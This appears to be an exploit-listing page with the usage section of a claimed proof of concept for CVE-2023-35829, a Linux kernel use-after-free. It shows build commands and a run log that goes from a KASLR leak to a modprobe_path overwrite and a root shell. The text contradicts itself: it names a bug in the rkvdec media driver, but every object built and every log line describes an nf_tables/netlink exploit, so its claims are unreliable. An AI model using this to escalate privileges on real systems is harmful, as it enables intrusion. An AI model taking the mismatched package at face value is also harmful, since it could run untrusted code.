Share
## https://sploitus.com/exploit?id=16C221AA-DEE3-5FD2-B61C-2D141098AD3E
# CVE-2023-35829-poc
CVE-2023-35829 Linux kernel before 6.3.2. A use-after-free was found in rkvdec_remove in drivers/staging/media/rkvdec/rkvdec.c. 

# Usage

```
chris@experience:~/CVE-2023-35829-poc# make
cc -pthread -static -o poc obj/keyring.o obj/main.o obj/modprobe.o obj/netlink.o obj/nf_tables.o obj/simple_xattr.o obj/uring.o obj/util.o
strip poc
cc -o get_root get_root_src/get_root.c
rm -fr get_root
chris@experience:~/CVE-2023-35829-poc# ./poc
[+] CVE-2023-35829 PoC
[+] Second process currently waiting
[+] Get CAP_NET_ADMIN capability
[+] Netlink socket created
[+] Netlink socket bound
[+] Table table created
[+] Set for the leak created
[+] Set for write primitive created
[+] Leak succeed
[+] kaslr base found 0xffffffff9f000000
[+] physmap base found 0xffff910a00000000
[+] modprobe path changed !
[+] Modprobe payload setup
[?] waitpid
[?] sem_post
[+++] Got root shell, should exit?
# id
uid=0(root) gid=0(root) groups=0(root)
```